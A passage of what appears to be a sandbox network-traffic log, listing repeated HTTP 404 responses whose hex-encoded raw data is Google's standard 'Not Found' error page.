65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:10:24 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:10:26 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:10:27 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:10:30 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:10:31 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:10:33 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
